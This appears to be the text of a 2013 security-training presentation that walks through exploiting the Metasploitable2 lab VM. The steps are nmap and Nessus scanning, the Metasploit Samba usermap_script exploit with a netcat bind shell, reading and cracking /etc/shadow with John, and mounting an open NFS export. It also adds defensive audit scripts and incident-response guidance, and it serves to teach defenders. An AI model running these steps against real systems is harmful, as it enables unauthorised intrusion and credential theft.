The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
Published in: Technology
  • 1. “Improving your defensive security posture with offensive security strategies”
      • Andrew Kozma
      • HTCIA, Atlantic Chapter Meeting, April 18th, 2013
  • 2. A bit about me…
      • Infosec professional working in healthcare
      • Co-founder of AtlSecCon
      • Midnight ethical hacker
      • A perpetual student
      • Security researcher/philosopher
      • Fan of the blues (secretly want to learn how to play the harmonica)
  • 3. Offensive Security
      • “How much can you know about yourself if you've never been in a fight?” ~Chuck Palahniuk, Fight Club
      • Hacking our own infrastructure to improve defensive security measures and processes
      • Tools – Kali Linux, a security distro maintained by Offensive-Security with all the tools required to test security; it’s free and always will be
      • Tactics – The application of tools
      • Strategy – The big picture, all the pieces working together to achieve an ultimate goal
  • 4. Creating a practice environment
      • “The first rule of fight club is, you don't talk about fight club.” ~Chuck Palahniuk, Fight Club
      • The goal: a controlled environment where it is safe to practice offensive security techniques
      • There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s
      • With proper planning and authorization, along with an understanding of the risks, you can test production infrastructure
      • Virtualization is a beautiful thing!
  • 5. Demo (Metasploitable2)
      • Nmap scan
          • Identify OS, services and open ports
      • Nessus vulnerability scan
          • Run a scan to find vulnerabilities that can potentially be exploited
      • Metasploit console
          • Import the info
          • Exploit the target
      • Post exploitation
          • Crack passwords with John
          • PWN the box
  • 6. Demo (nmap)
      • Scanning with nmap:
          -O            OS detection
          -sV           Service version detection
          -sC           NSE scripts
          -oX           Output in XML format
          --stylesheet nmap.xsl
          --open
          --reason
      • Copying the stylesheet to our working directory
      • Displaying the nmap scan in Iceweasel (Kali Linux browser)
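The slide above renders the -oX output through nmap.xsl for a human to read. For a defender the same XML is the more useful artifact: it is the machine-readable inventory of what the box exposes, and it can be diffed against an approved-services baseline on every scan. The parser below is an added example (not code from the presentation); the XML it reads is a constructed sample in the shape nmap -oX emits (nmaprun/host/address/os/ports/port/state/service/script), not a capture of the Metasploitable2 scan, and the addresses, OS match and version strings in it are invented.

```python
"""Turn nmap -oX output into a per-host service inventory.

Added example, not from the presentation. SAMPLE_NMAP_XML is constructed in
the shape nmap writes with -O -sV -sC -oX --reason; it is not real scan data.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -O -sV -sC --reason -oX scan.xml 192.0.2.10" start="0">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open" reason="syn-ack"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X" method="probed" conf="10"/>
        <script id="smb-os-discovery" output="(constructed sample script output)"/>
      </port>
      <port protocol="tcp" portid="8834">
        <state state="filtered" reason="no-response"/>
        <service name="unknown" method="table" conf="3"/>
      </port>
    </ports>
    <os>
      <osmatch name="Linux 2.6.X" accuracy="96"/>
    </os>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text, open_only=True):
    """Return {ipv4: {"os": str, "ports": [port dicts]}}.

    open_only=True mirrors nmap's --open flag: filtered/closed ports are dropped.
    """
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        osmatch = host.find("os/osmatch")  # only present when -O produced a match
        entry = {"os": osmatch.get("name") if osmatch is not None else "", "ports": []}
        for port in host.iter("port"):
            state = port.find("state")
            if open_only and state.get("state") != "open":
                continue
            svc = port.find("service")  # filled in by -sV
            product = ""
            if svc is not None:
                product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            entry["ports"].append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state"),
                "reason": state.get("reason"),  # what --reason adds to the text output
                "service": svc.get("name") if svc is not None else "",
                "product": product,
                "scripts": [s.get("id") for s in port.findall("script")],  # -sC results
            })
        hosts[addr] = entry
    return hosts


def report_lines(hosts):
    """Flatten the inventory into one line per exposed service, for diffing."""
    lines = []
    for addr, entry in sorted(hosts.items()):
        lines.append(f"{addr} os={entry['os'] or 'unknown'}")
        for p in entry["ports"]:
            lines.append(f"  {p['port']}/{p['proto']} {p['service']} {p['product']}".rstrip())
    return lines


if __name__ == "__main__":
    print("\n".join(report_lines(parse_nmap_xml(SAMPLE_NMAP_XML))))
```

Running this with open_only=False keeps the filtered port as well, which is what you want when the question is "why did this port not answer" rather than "what is listening".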
  • 7. Demo (nmap output)
  • 8. Demo (Nessus)
      • Nessus Vulnerability Scanner
      • Not native to Kali Linux
      • Download and install: dpkg -i “filename”
      • Register for the Home feed (free)
      • Connect to localhost, port 8834
      • Log in and select New Scan
  • 9. Demo (Nessus)
      • Launch the scan
      • Nessus indicates the scan progress
      • A summary is displayed once the scan is complete
  • 10. Demo (Nessus)
      • Export and save the report
  • 11. Demo (Nessus output)
  • 12. Demo (Metasploit)
      • Opening the Metasploit Framework console: enter the command “msfconsole”
      • Importing our nmap scan results into the Metasploit database: enter the command “db_import /path to the nmap scan”
  • 13. Demo (Metasploit)
      • We can validate the db_import by entering the command “hosts” at the msf prompt
      • We can also validate the services imported for that host from nmap by entering the command “services” at the msf prompt
  • 14. Demo (Metasploit)
      • Import the Nessus scan into Metasploit with the command “db_import /path to the file”
      • Now that it is imported into Metasploit we can view the vulnerabilities that Nessus detected with the command “vulns”
  • 15. Demo (Metasploit)
      • For this demo we are going to exploit Samba
      • Load the exploit in msf with the command “use exploit/multi/samba/usermap_script”
      • Once the exploit is loaded we can learn more about its functions via the command “info”
  • 16. Demo (Metasploit)
      • The command “show options” indicates any variables that require a value to be set
      • For this exploit a remote host must be identified; we use the command “set RHOST target.ip.address”
      • A payload to be delivered to the target is also required; we issue the command “set PAYLOAD cmd/unix/bind/netcat”
  • 17. Demo (Metasploit)
      • The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
  • 18. Demo (Metasploit)
      • We attack the target via the command “exploit”
      • Booyah! Shell access to the target!
      • We have root-level access to the target and interact via this shell
      • Let’s display the target system’s user accounts via the command “cat /etc/passwd”
      • We are going to select the data displayed and copy it to a .txt file
  • 19. Demo (Metasploit)
      • Now we need to grab the hashes associated with the user accounts we just viewed
      • This can be done by displaying the hashes via the command “cat /etc/shadow”
      • Once again we will select the information displayed and copy it to a .txt file
  • 20. Demo (usernames and hashes)
  • 21. Demo (John the Ripper)
      • We are going to use John the Ripper to crack the passwords for the user accounts
      • For John to crack them we have to combine the usernames and their hashes into a format that John can understand
      • We combine both files into a single one for John with the command “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt”
      • We now have a file with usernames and hashes that John can use
  • 22. Demo (John the Ripper)
      • We are going to take a quick peek at the contents of the new file
      • To do this we change to the directory the file resides in: “cd HTCIA”
      • We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
  • 23. Demo (John the Ripper)
      • To start cracking the passwords with John we issue the command “john /path to the filename.txt”
      • John has loaded the hashes and has successfully cracked some of the passwords
      • Previously cracked passwords can be viewed with the command “john --show /path to the file.txt”
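The unshadow output John consumes (slides 21 to 23) is a passwd line with the shadow hash spliced into the second field, and a plain /etc/shadow line carries the hash in the same position. The defensive counterpart to running John over it is to audit that field directly: accounts with no password at all, legacy DES or MD5-crypt schemes that crack in minutes on commodity hardware, and locked accounts that need no attention. The checker below is an added example, not from the presentation; the records it reads are constructed with fake salts and hash bodies and are not the Metasploitable2 accounts. The scheme prefixes are the standard glibc crypt identifiers.

```python
"""Grade the password-hash field of passwd/shadow-style records.

Added example, not from the presentation. SAMPLE_UNSHADOWED is constructed:
the salts and hash bodies are placeholders, the accounts are invented.
Works on unshadow output and on raw /etc/shadow lines (hash is field 2 in both).
"""
import re

SAMPLE_UNSHADOWED = """\
root:$1$FAKESALT$FAKEHASHBODYFAKEHASHBODY:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
sys:!:3:3:sys:/dev:/bin/sh
svc_old:AbCdEfGhIjKlM:1001:1001::/home/svc_old:/bin/bash
guest::1002:1002::/home/guest:/bin/bash
admin:$6$FAKESALT$FAKEHASHBODY:1003:1003::/home/admin:/bin/bash
"""

# glibc crypt(3) scheme identifiers and how a reviewer would grade them today.
SCHEMES = {
    "$1$": ("md5crypt", "weak"),
    "$2a$": ("bcrypt", "ok"),
    "$2b$": ("bcrypt", "ok"),
    "$2y$": ("bcrypt", "ok"),
    "$5$": ("sha256crypt", "ok"),
    "$6$": ("sha512crypt", "ok"),
    "$y$": ("yescrypt", "ok"),
}
# Traditional DES crypt: 2 salt chars + 11 hash chars, no '$' prefix, 8-char password limit.
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify_hash(field):
    """Return (scheme_name, grade) for one password field."""
    if field == "":
        return ("empty", "critical")  # account logs in with no password at all
    if field == "*" or field.startswith("!"):
        return ("locked", "ok")  # '*' and '!'/'!!' can never match a password
    for prefix, (name, grade) in SCHEMES.items():
        if field.startswith(prefix):
            return (name, grade)
    if DES_RE.match(field):
        return ("descrypt", "weak")
    return ("unknown", "review")


def audit_shadow(text):
    """One finding per record: user, scheme, grade, and login shell if present."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        scheme, grade = classify_hash(parts[1])
        findings.append({
            "user": parts[0],
            "scheme": scheme,
            "grade": grade,
            "shell": parts[6] if len(parts) > 6 else "",
        })
    return findings


def needs_action(findings):
    """The subset a remediation ticket should list: empty or weak-scheme hashes."""
    return [f for f in findings if f["grade"] in ("critical", "weak")]


if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_UNSHADOWED):
        print(f"{f['user']:10} {f['scheme']:12} {f['grade']}")
```

The remediation is the same one the demo motivates: rehash weak-scheme accounts on next login (modern PAM/login.defs defaults do this), lock or remove accounts with an empty field, and treat any file of this format that leaves the host as a credential leak.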
  • 24. Demo (Post Exploitation)
      • Using our new creds to SSH to the exploited workstation
      • To connect via SSH we use the command “ssh -l msfadmin Target.IP.Address”
      • Now we have a terminal session rather than a shell
      • In the real world we could continue to install backdoors, steal data, and pivot to scan for other hosts
  • 25. Demo (Post Exploitation)
      • Let’s review other services so that we can maintain a persistent presence on the compromised workstation
      • Hmmm, NFS services are running on the target…
  • 26. Demo (Post Exploitation)
      • Let’s take a quick look at the NFS share available on the target
      • Uh oh… everything is shared
      • We are going to create a temp directory and then mount the share in it
      • Let’s display the filesystem to see the NFS share mounted in temp
  • 27. Demo (Post Exploitation)
      • Looking into the share that we mounted…
      • We already know we can copy the contents of the passwd and shadow files again
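"Everything is shared" on slides 25 to 27 is an /etc/exports problem before it is an attacker problem: the root filesystem exported to any client, writable, without root squashing. The check below reads an exports file and flags the combinations that make that slide possible. It is an added example, not from the presentation; the exports content is constructed and is not Metasploitable2's actual configuration. The option semantics (no_root_squash, insecure, a missing client list meaning "everyone") are those documented in exports(5).

```python
"""Flag over-broad NFS exports in /etc/exports syntax.

Added example, not from the presentation. SAMPLE_EXPORTS is constructed.
Format per line: <path> <client>(opts) [<client>(opts) ...]; '#' starts a comment.
"""

SAMPLE_EXPORTS = """\
# constructed sample exports file
/ *(rw,no_root_squash)
/srv/backup 192.0.2.0/24(ro,root_squash)
/home *.example.internal(rw,sync)
/export/data 192.0.2.50(rw,no_root_squash,insecure) 192.0.2.51(ro)
"""


def parse_exports(text):
    """Return (path, client, options_set) triples, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:]
        if not specs:
            # A path with no client list is exported to everyone (exportfs warns about this).
            entries.append((path, "*", set()))
            continue
        for spec in specs:
            if "(" in spec:
                client, opts = spec.split("(", 1)
                options = set(o for o in opts.rstrip(")").split(",") if o)
            else:
                client, options = spec, set()
            entries.append((path, client or "*", options))  # "(rw)" alone means any client
    return entries


def audit_exports(text):
    """One finding per client spec that has at least one problem."""
    findings = []
    for path, client, options in parse_exports(text):
        problems = []
        if client.startswith("*"):
            problems.append("wildcard client")
        if path == "/":
            problems.append("exports the root filesystem")
        if "no_root_squash" in options:
            problems.append("no_root_squash: client root acts as server root")
        if "insecure" in options:
            problems.append("insecure: accepts requests from unprivileged source ports")
        if "rw" in options and problems:
            problems.append("writable")  # rw turns any of the above into a write path
        if problems:
            findings.append({"path": path, "client": client, "problems": problems})
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f['path']} -> {f['client']}: {', '.join(f['problems'])}")
```

The first constructed line is the slide's situation in one entry: wildcard client, root filesystem, no root squashing and read/write, which is why mounting it hands the client a copy of passwd and shadow. The second line shows the shape a reviewer wants to see: a specific network, read-only, root squashed.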
  • 28. Demo (Post Exploitation)
      • Remember our Nessus output
      • Collect as much information as possible during the information gathering phase…
      • Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
  • 29. Breaking things to make them better
      • “At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club
      • When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy-in from management
      • Document your findings, indicating the threat, the likelihood of occurrence and the impact to the business
      • Use this information to build business cases for investment in security solutions
      • When you start looking at the production environment… there will be blood…
  • 30. Advanced Persistent Response
      • “On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club
      • Understanding trends and current threats
      • Filling in the gaps with security (technology and process)
      • Creating and implementing a security model that meets organizational needs
  • 31. Incident Response
      • “With a gun barrel between your teeth, you speak only in vowels.” ~Chuck Palahniuk, Fight Club
      • Preparation
          • Have a plan, know who to call and when
      • Identification
          • Determination of whether or not there was an incident
      • Containment
          • Protecting other critical systems: “stop the bleeding”
      • Eradication
          • Addressing the vulnerabilities that were exploited
      • Recovery
          • Returning to operational status
      • Follow up
          • Lessons learned, prevent future incidents of the same nature
  • 32. Parting thoughts
      • Do you still think the best defense is a good offense?
      • IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
  • 33. References
      • Jeremy Druin @webpwnized has a great tutorial online going into more detail:
      • @netbiosx has a tutorial available online regarding NFS and Metasploitable2:
      • Nessus software and Home feed licensing can be found on their site:
      • Kali Linux can be obtained at and is maintained by Offensive-Security
      • Metasploitable2 is maintained by Rapid7 and is available for download from:
      • Why stop here! There are many other distros to help expand your skillset; check out @g0tmi1k and his website at
  • 34. Thank you
      • Twitter handle - @k0z1can